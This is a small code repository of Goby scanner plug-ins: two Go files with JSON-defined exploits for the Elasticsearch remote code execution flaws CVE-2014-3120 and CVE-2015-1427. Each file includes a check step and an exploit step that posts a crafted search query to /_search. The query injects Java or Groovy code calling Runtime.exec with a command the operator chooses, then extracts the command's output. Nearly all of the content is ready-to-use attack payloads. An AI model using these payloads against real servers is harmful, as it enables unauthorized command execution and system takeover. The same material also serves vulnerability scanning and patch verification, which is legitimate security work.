├── poc ├── Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go └── Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go └── readme.md /poc/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "git.gobies.org/goby/goscanner/goutils" 5 | ) 6 | 7 | func init() { 8 | expJson := `{ 9 | "Name": "Elasticsearch Remote Code Execution CVE-2014-3120", 10 | "Description": "The default configuration before Elasticsearch 1.2 enabled dynamic scripting, which allowed remote attackers to execute arbitrary MVEL expressions and Java code through the source parameter of _search.", 11 | "Product": "Elasticsearch", 12 | "Homepage": "https://gobies.org/", 13 | "DisclosureDate": "2021-04-10", 14 | "Author": "zhzyker", 15 | "GobyQuery": "product=elasticsearch", 16 | "Level": "3", 17 | "Impact": "

ElasticSearch is an open source, distributed, RESTful search engine built on Lucene. Designed for use in cloud computing, it can achieve real-time, stable, reliable and fast search, and is easy to install and use. Supports data indexing via HTTP request and using JSON.

Since ElasticSearch has enabled dynamic script execution by default, any user can execute arbitrary Java code by constructing a specially crafted submission.

", 18 | "Recommandation": "

The official version of elasticsearch 1.2 has been publicly released, and the dynamic script execution function is disabled by default.

", 19 | "References": [ 20 | "https://github.com/zhzyker" 21 | ], 22 | "HasExp": true, 23 | "ExpParams": [ 24 | { 25 | "name": "cmd", 26 | "type": "input", 27 | "value": "whoami" 28 | } 29 | ], 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "method": "POST", 39 | "uri": "/website/blog/", 40 | "follow_redirect": true, 41 | "header": { 42 | "Accept-Encoding": "gzip, deflate", 43 | "Accept": "*/*", 44 | "Connection": "close", 45 | "Accept-Language": "en", 46 | "Content-Type": "application/x-www-form-urlencoded" 47 | }, 48 | "data_type": "text", 49 | "data": "{ \"name\": \"cve-2014-3120\" }" 50 | }, 51 | "ResponseTest": { 52 | "type": "group", 53 | "operation": "AND", 54 | "checks": [ 55 | { 56 | "type": "item", 57 | "variable": "$code", 58 | "operation": "==", 59 | "value": "201", 60 | "bz": "http_code" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [] 65 | }, 66 | { 67 | "Request": { 68 | "method": "POST", 69 | "uri": "/_search?pretty", 70 | "follow_redirect": true, 71 | "header": { 72 | "Accept-Encoding": "gzip, deflate", 73 | "Accept": "*/*", 74 | "Connection": "close", 75 | "Accept-Language": "en", 76 | "Content-Type": "application/x-www-form-urlencoded" 77 | }, 78 | "data_type": "text", 79 | "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"echo 0d455d3d2044e6e7781771d932e68dbc_goby_nb\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}" 80 | }, 81 | "ResponseTest": { 82 | "type": "group", 83 | "operation": "AND", 84 | "checks": [ 85 | { 86 | "type": "item", 87 | "variable": "$code", 88 | "operation": "==", 89 | "value": "200", 90 | "bz": "" 91 | }, 92 | { 93 | "type": "item", 94 | "variable": "$body", 95 | "operation": "contains", 96 | "value": "0d455d3d2044e6e7781771d932e68dbc", 97 | "bz": "" 98 | } 99 | ] 100 | }, 101 | "SetVariable": [] 102 | } 103 | ], 104 | "ExploitSteps": [ 105 | "AND", 106 | { 107 | "Request": { 108 | "method": "POST", 109 | "uri": "/website/blog/", 110 | "follow_redirect": true, 111 | "header": { 112 | "Accept-Encoding": "gzip, deflate", 113 | "Accept": "*/*", 114 | "Connection": "close", 115 | "Accept-Language": "en", 116 | "Content-Type": "application/x-www-form-urlencoded" 117 | }, 118 | "data_type": "text", 119 | "data": "{ \"name\": \"cve-2014-3120\" }" 120 | }, 121 | "ResponseTest": { 122 | "type": "group", 123 | "operation": "AND", 124 | "checks": [ 125 | { 126 | "type": "item", 127 | "variable": "$code", 128 | "operation": "==", 129 | "value": "201", 130 | "bz": "http_code" 131 | } 132 | ] 133 | }, 134 | "SetVariable": [ 135 | "output|lastbody" 136 | ] 137 | }, 138 | { 139 | "Request": { 140 | "method": "POST", 141 | "uri": "/_search?pretty", 142 | "follow_redirect": true, 143 | "header": { 144 | "Accept-Encoding": "gzip, deflate", 145 | "Accept": "*/*", 146 | "Connection": "close", 147 | "Accept-Language": "en", 148 | "Content-Type": "application/x-www-form-urlencoded" 149 | }, 150 | "data_type": "text", 151 | "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"{{{cmd}}}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}" 152 | }, 153 | "ResponseTest": { 154 | "type": "group", 155 | "operation": "AND", 156 | "checks": [ 157 | { 158 | "type": "item", 159 | "variable": "$code", 160 | "operation": "==", 161 | "value": "200", 162 | "bz": "http_code" 163 | } 164 | ] 165 | }, 166 | "SetVariable": [ 167 | "output|lastbody|regex|(?s)\"command\" : (.*)}" 168 | ] 169 | } 170 | ], 171 | "Tags": [ 172 | "RCE" 173 | ], 174 | "CVEIDs": null, 175 | "CVSSScore": "0.0", 176 | "AttackSurfaces": { 177 | "Application": null, 178 | "Support": null, 179 | "Service": null, 180 | "System": null, 181 | "Hardware": null 182 | } 183 | }` 184 | 185 | ExpManager.AddExploit(NewExploit( 186 | goutils.GetFileName(), 187 | expJson, 188 | nil, 189 | nil, 190 | )) 191 | } 192 | -------------------------------------------------------------------------------- /poc/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "git.gobies.org/goby/goscanner/goutils" 5 | ) 6 | 7 | func init() { 8 | expJson := `{ 9 | "Name": "Elasticsearch Remote Code Execution CVE-2015-1427", 10 | "Description": "The Groovy script engine before Elasticsearch 1.3.8 and the Groovy script engine in 1.4.x before 1.4.3 allow remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands through elaborate scripts.", 11 | "Product": "Elasticsearch", 12 | "Homepage": "https://www.elastic.co/cn/elasticsearch/", 13 | "DisclosureDate": "2021-04-11", 14 | "Author": "zhzyker", 15 | "GobyQuery": "product=elasticsearch", 16 | "Level": "3", 17 | "Impact": "

In 2014, a remote code execution vulnerability (CVE-2014-3120) was exposed. The vulnerability appeared in the script query module. Since search engines support the use of script code (MVEL) as an expression for data manipulation, attackers can use MVEL Construct and execute arbitrary java code,

Later, the scripting language engine was changed to Groovy and a sandbox was added to control it. Dangerous codes would be intercepted. As a result, this time because the sandbox restrictions were not strict, it led to remote code execution.

", 18 | "Recommandation": "

Close the groovy sandbox to stop the use of dynamic scripts:

script.groovy.sandbox.enabled: false
", 19 | "References": [ 20 | "https://github.com/zhzyker" 21 | ], 22 | "HasExp": true, 23 | "ExpParams": [ 24 | { 25 | "name": "cmd", 26 | "type": "input", 27 | "value": "whoami" 28 | } 29 | ], 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "method": "POST", 39 | "uri": "/website/blog/", 40 | "follow_redirect": true, 41 | "header": { 42 | "Accept-Encoding": "gzip, deflate", 43 | "Accept": "*/*", 44 | "Connection": "close", 45 | "Accept-Language": "en", 46 | "Content-Type": "application/x-www-form-urlencoded" 47 | }, 48 | "data_type": "text", 49 | "data": "{ \"name\": \"cve-2015-1427\" }" 50 | }, 51 | "ResponseTest": { 52 | "type": "group", 53 | "operation": "AND", 54 | "checks": [ 55 | { 56 | "type": "item", 57 | "variable": "$code", 58 | "operation": "==", 59 | "value": "201", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [] 65 | }, 66 | { 67 | "Request": { 68 | "method": "POST", 69 | "uri": "/_search?pretty", 70 | "follow_redirect": true, 71 | "header": { 72 | "Accept-Encoding": "gzip, deflate", 73 | "Accept": "*/*", 74 | "Connection": "close", 75 | "Accept-Language": "en", 76 | "Content-Type": "application/text" 77 | }, 78 | "data_type": "text", 79 | "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"echo 460f7ccb583e25e09c0fe100a2c9e90d\\\").getText()\"}}}" 80 | }, 81 | "ResponseTest": { 82 | "type": "group", 83 | "operation": "AND", 84 | "checks": [ 85 | { 86 | "type": "item", 87 | "variable": "$code", 88 | "operation": "==", 89 | "value": "200", 90 | "bz": "" 91 | }, 92 | { 93 | "type": "item", 94 | "variable": "$body", 95 | "operation": "contains", 96 | "value": "460f7ccb583e25e09c0fe100a2c9e90d", 97 | "bz": "" 98 | } 99 | ] 100 | }, 101 | "SetVariable": [] 102 | } 103 | ], 104 | "ExploitSteps": [ 105 | "AND", 106 | { 107 | "Request": { 108 | "method": "POST", 109 | "uri": "/website/blog/", 110 | "follow_redirect": true, 111 | "header": { 112 | "Accept-Encoding": "gzip, deflate", 113 | "Accept": "*/*", 114 | "Connection": "close", 115 | "Accept-Language": "en", 116 | "Content-Type": "application/x-www-form-urlencoded" 117 | }, 118 | "data_type": "text", 119 | "data": "{ \"name\": \"cve-2015-1427\" }" 120 | }, 121 | "ResponseTest": { 122 | "type": "group", 123 | "operation": "AND", 124 | "checks": [ 125 | { 126 | "type": "item", 127 | "variable": "$code", 128 | "operation": "==", 129 | "value": "201", 130 | "bz": "" 131 | } 132 | ] 133 | }, 134 | "SetVariable": [ 135 | "output|lastbody" 136 | ] 137 | }, 138 | { 139 | "Request": { 140 | "method": "POST", 141 | "uri": "/_search?pretty", 142 | "follow_redirect": true, 143 | "header": { 144 | "Accept-Encoding": "gzip, deflate", 145 | "Accept": "*/*", 146 | "Connection": "close", 147 | "Accept-Language": "en", 148 | "Content-Type": "application/text" 149 | }, 150 | "data_type": "text", 151 | "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"{{{cmd}}}\\\").getText()\"}}}" 152 | }, 153 | "ResponseTest": { 154 | "type": "group", 155 | "operation": "AND", 156 | "checks": [ 157 | { 158 | "type": "item", 159 | "variable": "$code", 160 | "operation": "==", 161 | "value": "200", 162 | "bz": "" 163 | }, 164 | { 165 | "type": "item", 166 | "variable": "$body", 167 | "operation": "contains", 168 | "value": "460f7ccb583e25e09c0fe100a2c9e90d", 169 | "bz": "" 170 | } 171 | ] 172 | }, 173 | "SetVariable": [ 174 | "output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.*)\" \\]" 175 | ] 176 | } 177 | ], 178 | "Tags": [ 179 | "RCE" 180 | ], 181 | "CVEIDs": null, 182 | "CVSSScore": "0.0", 183 | "AttackSurfaces": { 184 | "Application": null, 185 | "Support": null, 186 | "Service": null, 187 | "System": null, 188 | "Hardware": null 189 | } 190 | }` 191 | 192 | ExpManager.AddExploit(NewExploit( 193 | goutils.GetFileName(), 194 | expJson, 195 | nil, 196 | nil, 197 | )) 198 | } -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Goby-PoC 2 | 3 | ![image](https://user-images.githubusercontent.com/32918050/114302697-b855d100-9afc-11eb-8658-4f70200021df.png) 4 | --------------------------------------------------------------------------------